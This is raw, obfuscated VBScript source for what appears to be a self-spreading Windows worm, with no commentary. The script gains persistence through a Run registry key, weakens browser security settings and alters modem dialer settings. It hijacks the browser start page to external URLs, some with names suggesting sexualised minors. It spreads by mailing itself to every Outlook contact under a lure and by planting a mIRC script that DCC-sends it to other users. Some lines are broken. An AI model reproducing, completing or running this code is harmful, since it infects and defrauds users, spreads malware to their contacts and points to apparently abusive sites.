On Error Resume Next
Set HFFLUO1U = createobject("scripting.filesystemobject")
HQOL4K4F = HFFLUO1U.getspecialfolder(0)
P5604884 = HQOL4K4F & "\fotompg.vbs"
Set TO1FSIHV = createobject("wscript.shell")
if TO1FSIHV.regread ("HKCU\software\moon\explorerpf") <> "1" then 
HFFLUO1U.copyfile wscript.scriptfullname, P5604884
TO1FSIHV.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer", "wscript.exe " & P5604884 & " %"
Q4512UMQ
TO1FSIHV.regwrite "HKCU\software\moon\explorerpf", 01,"REG_DWORD"
Set regedat = CreateObject("WScript.Shell")
regedat.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1004", 00,"REG_DWORD"
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Dial","M0"
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Off","M1"
regedat.RegWrite "HKCU\RemoteAccess\DialUI", 00000007,"REG_BINARY"
DHQK1AVD ""
GV8B6431
TO1FSIHV.run "http://www.kogalu.com/sou/internz/enter3.htm",3,false
end if
Q4512UMQ6

if day(now)=1 or day(now)=3 or day(now)=5 or day(now)=7 or day(now)=9 or day(now)=11 or day(now)=13 or day(now)=15 or day(now)=17 or day(now)=19 or day(now)=21 or day(now)=23 or day(now)=25 or day(now)=27 or day(now)=30 or day(now)=6 or day(now)=10 or day(now)=12 or day(now)=24 or day(now)=31 then
Q4512UMQ2
else
REX
end if




Function Q4512UMQ()
regcreate "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page","http://www.kogalu.com/sou/internz/enter3.htm"
Set regedat = CreateObject("WScript.Shell")
regedat.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1004", 00,"REG_DWORD"
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Dial","M0"
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Off","M1"
regedat.RegWrite "HKCU\RemoteAccess\DialUI", 00000007,"REG_BINARY"

end function

Function Q4512UMQ2()
If (HFFLUO1U.FileExists(HQOL4K4F+"\XXX_Adult.exe")) Then
Set regedat = CreateObject("WScript.Shell")
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Dial","M0"
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Off","M1"
regedat.RegWrite "HKCU\RemoteAccess\DialUI", 00000007,"REG_BINARY"
TO1FSIHV.run HQOL4K4F+"\XXX_Adult.exe",false
else
regcreate "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page","http://www.kogalu.com/sou/internz/enter3.htm"
Set regedat = CreateObject("WScript.Shell")
regedat.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1004", 00,"REG_DWORD"
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Dial","M0"
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Off","M1"
regedat.RegWrite "HKCU\RemoteAccess\DialUI", 00000007,"REG_BINARY"
end if
end function

Function REX()
If (HFFLUO1U.FileExists(HQOL4K4F+"\XXX_Adult.exe")) Then
Randomize
If 1 + Int(Rnd * 8) = 2 then
Set regedat = CreateObject("WScript.Shell")
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Dial","M0"
regedat.RegWrite "HKLM\System\CurrentControlSet\Services\Class\Modem\0000\Settings\SpeakerMode_Off","M1"
regedat.RegWrite "HKCU\RemoteAccess\DialUI", 00000007,"REG_BINARY"
TO1FSIHV.run HQOL4K4F+"\XXX_Adult.exe",false
else
regcreate "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page","http://www.kogalu.com/sou/internz/enter3.htm"
end if
end if
end function


sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub 



Function Q4512UMQ6()
On Error Resume Next
If (HFFLUO1U.FileExists(HQOL4K4F+"\XXX_Adult.exe")) Then
TO1FSIHV.regwrite "HKCU\software\moon\explorervs", 00,"REG_DWORD"
Randomize
If 1 + Int(Rnd * 3) = 2 then
regcreate "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page","http://www.topnymphets.com/pics?id=omanko"
else
regcreate "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page","http://www.toplittle.com/pics?id=omanko"
end if
end if
end function

Function GV8B6431()
On Error Resume Next
Set K13L76VF = CreateObject("Outlook.Application")
If K13L76VF = "Outlook" Then
Set HB8EDRD0 = K13L76VF.GetNameSpace("MAPI")
Set H5HG4H16 = HB8EDRD0.AddressLists
For Each SBS8397M In H5HG4H16
If SBS8397M.AddressEntries.Count <> 0 Then
FI287344 = SBS8397M.AddressEntries.Count
For IDBN64FV = 1 To FI287344
Set J6C3B136 = K13L76VF.CreateItem(0)
Set G26F291V = SBS8397M.AddressEntries(IDBN64FV)
J6C3B136.To = G26F291V.Address
J6C3B136.Subject = "Hi"
J6C3B136.HtmlBody = "<HTML><HEAD><META content='text/html; charset=iso-2022-jp' http-equiv=Content-Type><META content='MSHTML 5.00.2919.6307' name=GENERATOR></HEAD><BODY>Hi, look at this funny photo.......<IFRAME SRC='http://spazioweb.inwind.it/girlz2002/pucchi/gol.htm'></IFRAME> </BODY></HTML>"
pinocchio = P5604884
set Attachs=J6C3B136.Attachments
Attachs.Add pinocchio
J6C3B136.DeleteAfterSubmit = True
If J6C3B136.To <> "" Then
J6C3B136.Send
End If
Next
End If
Next
End If
End function

Function DHQK1AVD(S65KST2R)
On Error Resume Next
If S65KST2R <> "" Then
PFP108L4 = TO1FSIHV.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If HFFLUO1U.fileexists("c:\mirc\mirc.ini") Then
S65KST2R = "c:\mirc"
ElseIf HFFLUO1U.fileexists("c:\mirc32\mirc.ini") Then
S65KST2R = "c:\mirc32"
ElseIf HFFLUO1U.fileexists(PFP108L4 & "\mirc\mirc.ini") Then
S65KST2R = PFP108L4 & "\mirc"
ElseIf HFFLUO1U.fileexists(PFP108L4 & "\mirc32\mirc.ini") Then
S65KST2R = PFP108L4 & "\mirc"
Else
S65KST2R = ""
End If
End If
If S65KST2R <> "" Then
Set PDP8HF5D = HFFLUO1U.CreateTextFile(S65KST2R & "\script.ini", True)
PDP8HF5D = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
PDP8HF5D = PDP8HF5D & vbCrLf & "n0=on 1:JOIN:#:{"
PDP8HF5D = PDP8HF5D & vbCrLf & "n1=  /if ( $nick == $me ) { halt }"
PDP8HF5D = PDP8HF5D & vbCrLf & "n2=  /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
PDP8HF5D = PDP8HF5D & P5604884
PDP8HF5D = PDP8HF5D & vbCrLf & "n3=}"
script.Close
End If
End Function
Function F7E6IOBR()
On Error Resume Next
Set UGME4U0S = HFFLUO1U.Drives
For Each CPQ92IV5 In UGME4U0S
KUR8ROO2 = CPQ92IV5 & " \ "
Call HI0771DM(KUR8ROO2)
Next
End Function

Function HI0771DM(BO64512U)
On Error Resume Next
M46SPKI5 = BO64512U
Set E9DV8B64 = HFFLUO1U.GetFolder(M46SPKI5)
Set CK94TS3G = E9DV8B64.Files
For Each JBBHQK1A In CK94TS3G
If lcase(JBBHQK1A.Name) = "mirc.ini" Then
DHQK1AVD(JBBHQK1A.ParentFolder)
End If
Next
Set VTN13L76 = E9DV8B64.Subfolders
For Each VQGB8EDR In VTN13L76
Call (VQGB8EDR.path)
Next
End function